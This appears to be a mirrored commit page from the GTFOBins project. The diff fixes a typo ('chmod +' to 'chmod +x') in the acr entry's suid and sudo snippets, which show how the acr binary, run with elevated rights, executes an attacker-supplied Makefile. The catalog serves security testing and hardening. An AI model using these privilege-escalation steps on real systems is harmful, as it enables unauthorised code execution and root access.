mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Update acr.md
This commit is contained in:
parent
15eb4b376a
commit
543e69ff7b
@ -3,13 +3,13 @@ functions:
|
|||||||
suid:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
sudo install acr $(which acr) .
|
sudo install acr $(which acr) .
|
||||||
touch Makefile && chmod + Makefile
|
touch Makefile && chmod +x Makefile
|
||||||
echo DATA > Makefile
|
echo DATA > Makefile
|
||||||
./acr -r Makefile
|
./acr -r Makefile
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo install acr $(which acr) .
|
sudo install acr $(which acr) .
|
||||||
touch Makefile && chmod + Makefile
|
touch Makefile && chmod +x Makefile
|
||||||
echo DATA > Makefile
|
echo DATA > Makefile
|
||||||
sudo acr -r Makefile
|
sudo acr -r Makefile
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user